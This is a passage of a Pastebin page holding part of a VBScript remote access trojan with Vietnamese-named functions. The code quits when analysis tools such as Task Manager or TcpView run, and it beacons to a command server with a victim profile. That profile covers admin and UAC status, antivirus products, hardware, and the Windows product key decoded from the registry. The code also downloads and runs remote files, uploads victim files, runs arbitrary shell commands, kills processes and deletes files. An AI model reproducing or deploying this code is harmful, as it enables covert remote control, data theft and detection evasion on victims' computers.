  418. THOAT_XAC
  419. elseif RTM_9.Count=1 then
  420. THOAT_XAC
  421. elseif RTM_10.Count=1 then
  422. THOAT_XAC
  423. elseif RTM_11.Count=1 then
  424. THOAT_XAC
  425. elseif RTM_12.Count=1 then
  426. THOAT_XAC
  427. end if
  428. end function
  429. function ROUTER_HAI()
  430. on error resume next
  431. set RTM_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'taskmgr.exe'")
  432. set RTM_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'apatedns.exe'")
  433. set RTM_3 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'fab.exe'")
  434. set RTM_4 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'cports.exe'")
  435. set RTM_5 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'smsniff.exe'")
  436. set RTM_6 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'HijackThis.exe'")
  437. set RTM_7 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'netagent.exe'")
  438. set RTM_8 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'tiger-Firewall.exe'")
  439. set RTM_9 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'TcpView.exe'")
  440. set RTM_10 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Active Ports.exe'")
  441. if RTM_1.Count=1 then
  442. THOAT_XAC
  443. elseif RTM_2.Count=1 then
  444. THOAT_XAC
  445. elseif RTM_3.Count=1 then
  446. THOAT_XAC
  447. elseif RTM_4.Count=1 then
  448. THOAT_XAC
  449. elseif RTM_5.Count=1 then
  450. THOAT_XAC
  451. elseif RTM_6.Count=1 then
  452. THOAT_XAC
  453. elseif RTM_7.Count=1 then
  454. THOAT_XAC
  455. elseif RTM_8.Count=1 then
  456. THOAT_XAC
  457. elseif RTM_9.Count=1 then
  458. THOAT_XAC
  459. elseif RTM_10.Count=1 then
  460. THOAT_XAC
  461. end if
  462. end function
  463. function THANKGOD_YOUAREHERE(LENHTHUCTHI,TSO_CHO_LENHTHUCTHI)
  464. THANKGOD_YOUAREHERE = TSO_CHO_LENHTHUCTHI
  465. MANGCUATUI.open "post","http://" & DIACHI_KETNOI & ":" & CONG_KETNOI &"/" & LENHTHUCTHI,false
  466. MANGCUATUI.setrequestheader "user-agent:",TAPHOPINFOR_HAM
  467. MANGCUATUI.send TSO_CHO_LENHTHUCTHI
  468. THANKGOD_YOUAREHERE = MANGCUATUI.responsetext
  469. end function
  470. sub LAY_FILETHEO_URL_VA_THUCTHI_SUB(URL_CHUA_FILE,TEN_FILE_GUI_URL)
  471. CHUOI_LIENKET = URL_CHUA_FILE
  472. if not OBJ_HTHONG_TTIN.folderexists(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP) then
  473. CHUOI_DATFILE_VAODAU = STR_DUONGDAN_USER_TEMP & "\" & TEN_FILE_GUI_URL
  474. else
  475. CHUOI_DATFILE_VAODAU = STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP & "\" & TEN_FILE_GUI_URL
  476. end if
  477. set OBJ_LAY_FILE_URL_VA_CHAY = createobject("msxml2.xmlhttp")
  478. OBJ_LAY_FILE_URL_VA_CHAY.open "get", CHUOI_LIENKET, false
  479. OBJ_LAY_FILE_URL_VA_CHAY.send
  480. set OBJ_HETHONG_TAPTIN_FILE_URL_RUN = createobject("scripting.filesystemobject")
  481. if OBJ_HETHONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
  482. OBJ_HETHONG_TAPTIN_FILE_URL_RUN.deletefile(CHUOI_DATFILE_VAODAU),true
  483. end if
  484. if OBJ_LAY_FILE_URL_VA_CHAY.status = 200 then
  485. dim ADO_TAI_URL_CHAY
  486. set ADO_TAI_URL_CHAY = createobject("adodb.stream")
  487. with ADO_TAI_URL_CHAY
  488. .type = 1
  489. .open
  490. .write OBJ_LAY_FILE_URL_VA_CHAY.responsebody
  491. .savetofile CHUOI_DATFILE_VAODAU
  492. .close
  493. end with
  494. set ADO_TAI_URL_CHAY = nothing
  495. end if
  496. if OBJ_HETHONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
  497. OBJ_WSSHELL.run OBJ_HETHONG_TAPTIN_FILE_URL_RUN.getfile(CHUOI_DATFILE_VAODAU).shortpath
  498. end if
  499. end sub
  500. sub DUAFILELEN_VIC_ROICHAY_SUB(URL_CHUA_FILE,THU_MUC_VIC_NHAN)
  501. if THU_MUC_VIC_NHAN = "" then
  502. if not OBJ_HTHONG_TTIN.folderexists(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP) then
  503. THU_MUC_VIC_NHAN = STR_DUONGDAN_USER_TEMP & "\"
  504. else
  505. THU_MUC_VIC_NHAN = STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP & "\"
  506. end if
  507. end if
  508. CHUOI_DATFILE_VAODAU = THU_MUC_VIC_NHAN & mid(URL_CHUA_FILE, instrrev(URL_CHUA_FILE,"\") + 1)
  509. set OBJ_DUAFILELEN_VIC_VA_CHAY = createobject("msxml2.xmlhttp")
  510. OBJ_DUAFILELEN_VIC_VA_CHAY.open "post","http://" & DIACHI_KETNOI & ":" & CONG_KETNOI &"/" & "is-sending" & MK & URL_CHUA_FILE, false
  511. OBJ_DUAFILELEN_VIC_VA_CHAY.send ""
  512. set OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN = createobject("scripting.filesystemobject")
  513. if OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
  514. OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.deletefile(CHUOI_DATFILE_VAODAU),true
  515. end if
  516. if OBJ_DUAFILELEN_VIC_VA_CHAY.status = 200 then
  517. dim ADO_TAI_DISKFILE_LEN_VA_CHAY
  518. set ADO_TAI_DISKFILE_LEN_VA_CHAY = createobject("adodb.stream")
  519. with ADO_TAI_DISKFILE_LEN_VA_CHAY
  520. .type = 1
  521. .open
  522. .write OBJ_DUAFILELEN_VIC_VA_CHAY.responsebody
  523. .savetofile CHUOI_DATFILE_VAODAU
  524. .close
  525. end with
  526. set ADO_TAI_DISKFILE_LEN_VA_CHAY = nothing
  527. end if
  528. if OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
  529. OBJ_WSSHELL.run OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.getfile(CHUOI_DATFILE_VAODAU).shortpath
  530. end if
  531. end sub
  532. function LAY_FILE_VENHA_FILEMAN_HAM(URL_CHUA_FILE)
  533. dim MANGCUATUI,ADO_LAY_FILE_VENHA,BO_DEM_BUF_LAY_FILE_VE_NHA
  534. set ADO_LAY_FILE_VENHA = createobject("adodb.stream")
  535. with ADO_LAY_FILE_VENHA
  536. .type = 1
  537. .open
  538. .loadfromfile URL_CHUA_FILE
  539. BO_DEM_BUF_LAY_FILE_VE_NHA = .read
  540. .close
  541. end with
  542. set ADO_LAY_FILE_VENHA = nothing
  543. set MANGCUATUI = createobject("msxml2.xmlhttp")
  544. MANGCUATUI.open "post","http://" & DIACHI_KETNOI & ":" & CONG_KETNOI &"/" & "is-recving" & MK & URL_CHUA_FILE, false
  545. MANGCUATUI.send BO_DEM_BUF_LAY_FILE_VE_NHA
  546. end function
  547. function LAYCACODIA_HAM()
  548. for each EXTDEVS in OBJ_HTHONG_TTIN.drives
  549. if EXTDEVS.isready = true then LAYCACODIA_HAM = LAYCACODIA_HAM & EXTDEVS.path & "|" & EXTDEVS.drivetype & MK
  550. next
  551. end function
  552. function CACTHUMUC_HAM(CACTHUMUC_GET_INF)
  553. CACTHUMUC_HAM = CACTHUMUC_GET_INF & MK
  554. for each THUMUC_DACO_IN_MAY in OBJ_HTHONG_TTIN.getfolder(CACTHUMUC_GET_INF).subfolders
  555. CACTHUMUC_HAM = CACTHUMUC_HAM & THUMUC_DACO_IN_MAY.name & "|" & "" & "|" & "d" & "|" & THUMUC_DACO_IN_MAY.attributes & MK
  556. next
  557. for each TTIN_DACO_IN_MACHINE in OBJ_HTHONG_TTIN.getfolder(CACTHUMUC_GET_INF).files
  558. CACTHUMUC_HAM = CACTHUMUC_HAM & TTIN_DACO_IN_MACHINE.name & "|" & TTIN_DACO_IN_MACHINE.size & "|" & "f" & "|" & TTIN_DACO_IN_MACHINE.attributes & MK
  559. next
  560. end function
  561. function CACTIENTRINH_HAM()
  562. on error resume next
  563. set CACDTTHEOCOT_PROC = DT_WMG_DOT.execquery("select * from win32_process",,48)
  564. dim DT_PROC
  565. for each DT_PROC in CACDTTHEOCOT_PROC
  566. CACTIENTRINH_HAM = CACTIENTRINH_HAM & DT_PROC.name & "|"
  567. CACTIENTRINH_HAM = CACTIENTRINH_HAM & DT_PROC.processid & "|"
  568. CACTIENTRINH_HAM = CACTIENTRINH_HAM & DT_PROC.executablepath & MK
  569. next
  570. end function
  571. sub TAT_TIENTRINH_SUB(MASO_TIENTRINH)
  572. on error resume next
  573. OBJ_WSSHELL.run "taskkill /F /T /PID " & MASO_TIENTRINH,7,true
  574. end sub
  575. sub XOA_TAPTIN_VA_THUMUC_SUB(DUONGDAN_FILE_OR_THUMUC)
  576. on error resume next
  577. OBJ_HTHONG_TTIN.deletefile DUONGDAN_FILE_OR_THUMUC,true
  578. OBJ_HTHONG_TTIN.deletefolder DUONGDAN_FILE_OR_THUMUC,true
  579. end sub
  580. function DIEUKHIEN_CMD_HAM(LENHTHUCTHI)
  581. dim MANGCUATUI,OBJ_WSSHELL_EXECU,DOCDATA_SHELLOUT
  582. set OBJ_WSSHELL_EXECU = OBJ_WSSHELL.exec("%comspec% /c " & LENHTHUCTHI)
  583. if not OBJ_WSSHELL_EXECU.stdout.atendofstream then
  584. DOCDATA_SHELLOUT = OBJ_WSSHELL_EXECU.stdout.readall
  585. elseif not OBJ_WSSHELL_EXECU.stderr.atendofstream then
  586. DOCDATA_SHELLOUT = OBJ_WSSHELL_EXECU.stderr.readall
  587. else
  588. DOCDATA_SHELLOUT = ""
  589. end if
  590. DIEUKHIEN_CMD_HAM = DOCDATA_SHELLOUT
  591. end function
  592. function TAPHOPINFOR_HAM
  593. on error resume next
  594. dim DIGI_PROID
  595. DIGI_PROID = OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId")
  596. if VEU = "" then
  597. VEU = LAY_TENVIC_THEOMAHW_HAM & MK
  598. VEU = VEU & OBJ_WSSHELL.expandenvironmentstrings("%computername%") & MK
  599. VEU = VEU & OBJ_WSSHELL.expandenvironmentstrings("%username%") & MK
  600. set HDH = DT_WMG_IMP.execquery("select * from win32_operatingsystem")
  601. for each TEN_HDH in HDH
  602. if not OBJ_HTHONG_TTIN.folderexists(OBJ_WSSHELL.expandenvironmentstrings("%PROGRAMFILES(x86)%")) then
  603. VEU = VEU & TEN_HDH.caption & " x86 SP" & TEN_HDH.ServicePackMajorVersion & MK
  604. else
  605. VEU = VEU & TEN_HDH.caption & " x64 SP" & TEN_HDH.ServicePackMajorVersion & MK
  606. end if
  607. exit for
  608. next
  609. if CHECKISADMIN_HAM = false then
  610. if UAC_DABAT_HAM = true then
  611. VEU = VEU & "Non-Admin/On/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
  612. else
  613. VEU = VEU & "Non-Admin/Off/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
  614. end if
  615. else
  616. if UAC_DABAT_HAM = true then
  617. VEU = VEU & "Admin/On/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
  618. else
  619. VEU = VEU & "Admin/Off/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
  620. end if
  621. end if
  622. VEU = VEU & LAY_TENTRINH_AV_HAM & MK
  623. VEU = VEU & COHAYKO_TU_USB
  624. TAPHOPINFOR_HAM = VEU
  625. else
  626. TAPHOPINFOR_HAM = VEU
  627. end if
  628. end function
  629. function CHECKISADMIN_HAM()
  630. dim LA_ADMIN
  631. call ADMINLOCALGROUP_HAM(LA_ADMIN)
  632. if LA_ADMIN = 1 then
  633. CHECKISADMIN_HAM = true
  634. else
  635. CHECKISADMIN_HAM = false
  636. end if
  637. set LA_ADMIN = nothing
  638. end function
  639. function ADMINLOCALGROUP_HAM(ISADMIN)
  640. PCNAME = "."
  641. set OBJ_MANG = CreateObject("WScript.Network")
  642. set COT_CACNHOM = GetObject("WinNT://" & PCNAME & "")
  643. COT_CACNHOM.Filter = Array("group")
  644. for each NHOM in COT_CACNHOM
  645. for each TVIEN in NHOM.Members
  646. if TVIEN.Name = OBJ_MANG.UserName then
  647. CACNHOM = CACNHOM & " , " & NHOM.Name
  648. end if
  649. next
  650. next
  651. for each NHOM_QUANTRI in DT_WMG_DOT.ExecQuery("SELECT * FROM Win32_Group WHERE SID = 'S-1-5-32-544'")
  652. TEN_NHOMQUANTRI = NHOM_QUANTRI.Name
  653. next
  654. if InStr(LCase(CACNHOM), LCase(TEN_NHOMQUANTRI)) > 0 then
  655. ISADMIN = 1
  656. end if
  657. set COT_CACNHOM = nothing
  658. end function
  659. function DNET_HAM
  660. on error resume next
  661. N2 = OBJ_WSSHELL.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727\Version")
  662. N4 = OBJ_WSSHELL.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\Version")
  663. if (N2 <> "") and (N4 <> "") then
  664. if OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll") then
  665. DNET_HAM = N4
  666. elseif OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll") then
  667. DNET_HAM = N2
  668. else
  669. DNET_HAM = N2 & "+" & N4
  670. end if
  671. elseif N2 <> "" then
  672. if OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll") then DNET_HAM = N2
  673. elseif N4 <> "" then
  674. if OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll") then DNET_HAM = N4
  675. else
  676. DNET_HAM = "Ask Him_Her :)"
  677. end if
  678. end function
  679. function TENCPU_HAM()
  680. on error resume next
  681. set COT_BOVIXULY = DT_WMG_IMP.execquery("select * from Win32_Processor")
  682. for each DOI_TUONG_IN_BOVIXULY in COT_BOVIXULY
  683. TENCPU_HAM = DOI_TUONG_IN_BOVIXULY.name
  684. next
  685. end function
  686. function MYRAM_HAM
  687. on error resume next
  688. set COT_COMSYSTEM = DT_WMG_IMP.execquery("select * from Win32_ComputerSystem")
  689. SO_GB = 1024*1024*1024
  690. for each DOI_TUONG_IN_COMSYSTEM in COT_COMSYSTEM
  691. MYRAM_HAM = Round(DOI_TUONG_IN_COMSYSTEM.TotalPhysicalMemory/SO_GB,3) & "MB"
  692. exit for
  693. next
  694. end function
  695. function TENGPU_HAM()
  696. on error resume next
  697. set COT_VIDEOCONTROL = DT_WMG_DOT.execquery("Select * from Win32_VideoController",,48)
  698. for each DOI_TUONG_IN_VIDEOCONTROL in COT_VIDEOCONTROL
  699. TENGPU_HAM = DOI_TUONG_IN_VIDEOCONTROL.caption
  700. next
  701. end function
  702. function CVERT_PCKEY_HAM(PRODID)
  703. on error resume next
  704. const KEY_MAU = 52
  705. dim CACMAY_WIN8_VE_SAU,KYTU_SO,CHYM,BUOM,HIENTAI,XUAT_KEY,KEY_CUOI,KEY_MOT,CHENVAO
  706. CACMAY_WIN8_VE_SAU = (PRODID(66)\6) and 1
  707. PRODID(66) = (PRODID(66) and &HF7) Or ((CACMAY_WIN8_VE_SAU and 2)*4)
  708. CHYM = 24
  709. KYTU_SO = "BCDFGHJKMPQRTVWXY2346789"
  710. do
  711. HIENTAI = 0
  712. BUOM = 14
  713. do
  714. HIENTAI = HIENTAI * 256
  715. HIENTAI = PRODID(BUOM + KEY_MAU) + HIENTAI
  716. PRODID(BUOM + KEY_MAU) = (HIENTAI\24)
  717. HIENTAI = HIENTAI mod 24
  718. BUOM = BUOM - 1
  719. loop while BUOM >= 0
  720. CHYM = CHYM - 1
  721. XUAT_KEY = mid(KYTU_SO,HIENTAI + 1, 1) & XUAT_KEY
  722. KEY_CUOI = HIENTAI
  723. loop while CHYM >= 0
  724. KEY_MOT = mid(XUAT_KEY, 2, KEY_CUOI)
  725. CHENVAO = "N"
  726. XUAT_KEY = Replace(XUAT_KEY, KEY_MOT, KEY_MOT & CHENVAO, 2, 1, 0)
  727. if KEY_CUOI = 0 then XUAT_KEY = CHENVAO & XUAT_KEY
  728. CVERT_PCKEY_HAM = mid(XUAT_KEY, 1, 5) & "-" & mid(XUAT_KEY, 6, 5) & "-" & mid(XUAT_KEY, 11, 5) & "-" & mid(XUAT_KEY, 16, 5) & "-" & mid(XUAT_KEY, 21, 5)
  729. end function
  730. function MAHW_HAM
  731. on error resume next
  732. set CAC_HDD = DT_WMG_IMP.execquery("select * from win32_logicaldisk")
  733. for each ODIACUNG_SSD in CAC_HDD
  734. if ODIACUNG_SSD.volumeserialnumber <> "" then
  735. MAHW_HAM = Trim(ODIACUNG_SSD.volumeserialnumber) & "_"
  736. exit for
  737. end if
  738. next
  739. end function
  740. function LAY_TENVIC_THEOMAHW_HAM
  741. on error resume next
  742. set CAC_HDD = DT_WMG_IMP.execquery("select * from win32_logicaldisk")
  743. for each ODIACUNG_SSD in CAC_HDD
  744. if ODIACUNG_SSD.volumeserialnumber <> "" then
  745. if DT_ID_CHO_PC = "" Or DT_ID_CHO_PC = " " then
  746. LAY_TENVIC_THEOMAHW_HAM = Trim(ODIACUNG_SSD.volumeserialnumber) & "_v0416"
  747. else
  748. LAY_TENVIC_THEOMAHW_HAM = Trim(ODIACUNG_SSD.volumeserialnumber) & "_" & DT_ID_CHO_PC
  749. end if
  750. exit for
  751. end if
  752. next
  753. end function
  754. function LAY_TENTRINH_AV_HAM
  755. on error resume next
  756. LAY_TENTRINH_AV_HAM = ""
  757. set CAC_DT_THEOCOT_HDH = DT_WMG_IMP.execquery("select * from win32_operatingsystem",,48)
  758. for each DT_AV in CAC_DT_THEOCOT_HDH
  759. PHIENBAN_AV = split(DT_AV.version,".")
  760. next
  761. PHIENBAN_AV = split(CAC_DT_THEOCOT_HDH.version,".")
  762. PHIENBAN_HDH = PHIENBAN_AV(0) & "."
  763. for x = 1 to ubound(PHIENBAN_AV)
  764. PHIENBAN_HDH = PHIENBAN_HDH & PHIENBAN_AV(i)
  765. next
  766. PHIENBAN_HDH = eval(PHIENBAN_HDH)
  767. if PHIENBAN_HDH > 6 then
  768. TRUNGTAM_SECU = "securitycenter2"
  769. else
  770. TRUNGTAM_SECU = "securitycenter"
  771. end if
  772. set DT_TRUNGTAM_SECU = getobject("winmgmts:\\localhost\root\" & TRUNGTAM_SECU)
  773. set COT_AV = DT_TRUNGTAM_SECU.execquery("select * from antivirusproduct","wql",0)
  774. for each TEN_AV in COT_AV
  775. LAY_TENTRINH_AV_HAM = LAY_TENTRINH_AV_HAM & TEN_AV.displayname & ". "
  776. next
  777. if LAY_TENTRINH_AV_HAM = "" then LAY_TENTRINH_AV_HAM = "None AV"
  778. set DT_TRUNGTAM_SECU = nothing
  779. end function
  780. function GOBO_KYTUSAI_HAM(CHUOI_DE_SCRUB)
  781. dim CHUOI_DA_SCRUB
  782. CHUOI_DA_SCRUB = Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(CHUOI_DE_SCRUB, "|", ""), ">", ""), "<", ""), Chr(34), ""), "?", ""), "*", ""), ":", ""), "/", ""), "\", "")
  783. GOBO_KYTUSAI_HAM = CHUOI_DA_SCRUB
  784. end function
  785. sub XOA_TEMP_SAU_X_NGAY_SUB(STR_DUONGDANTEMP_INSUB_AUTOX)
  786. on error resume next
  787. dim OBJ_HTHONG_TAPTIN_CHOTEMP,OBJ_DUONGDAN_FOLDER_CANCHO_TEMP,OBJ_CAC_DIR_TEMP,OBJ_CAC_FILE_TEMP,i
  788. set OBJ_HTHONG_TAPTIN_CHOTEMP = CreateObject("Scripting.FileSystemObject")
  789. set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = OBJ_HTHONG_TAPTIN_CHOTEMP.GetFolder(STR_DUONGDANTEMP_INSUB_AUTOX)
  790. for each OBJ_CAC_FILE_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.Files
  791. if OBJ_CAC_FILE_TEMP.DateCreated < (Now() - 8) then OBJ_CAC_FILE_TEMP.delete(true)
  792. next
  793. for i = 0 to 10
  794. for each OBJ_CAC_DIR_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.SubFolders
  795. if OBJ_CAC_DIR_TEMP.DateCreated < (Now() - 8) then OBJ_CAC_DIR_TEMP.Delete(true)
  796. next
  797. next
  798. set OBJ_HTHONG_TAPTIN_CHOTEMP = nothing
  799. set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = nothing
  800. set OBJ_CAC_DIR_TEMP = nothing
  801. set OBJ_CAC_FILE_TEMP = nothing
  802. end sub
  803. sub XOA_FILEVAFOLDER_SUB(STR_DUONGDANTEMP_INSUB)
  804. on error resume next
  805. dim OBJ_HTHONG_TAPTIN_CHOTEMP,OBJ_DUONGDAN_FOLDER_CANCHO_TEMP,OBJ_CAC_DIR_TEMP,OBJ_CAC_FILE_TEMP,i
  806. set OBJ_HTHONG_TAPTIN_CHOTEMP = CreateObject("Scripting.FileSystemObject")
  807. set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = OBJ_HTHONG_TAPTIN_CHOTEMP.GetFolder(STR_DUONGDANTEMP_INSUB)
  808. for each OBJ_CAC_FILE_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.Files
  809. OBJ_CAC_FILE_TEMP.delete(true)
  810. next
  811. for i = 0 to 10
  812. for each OBJ_CAC_DIR_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.SubFolders
  813. OBJ_CAC_DIR_TEMP.Delete(true)
  814. next
  815. next
  816. set OBJ_HTHONG_TAPTIN_CHOTEMP = nothing
  817. set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = nothing
  818. set OBJ_CAC_DIR_TEMP = nothing
  819. set OBJ_CAC_FILE_TEMP = nothing
  820. end sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!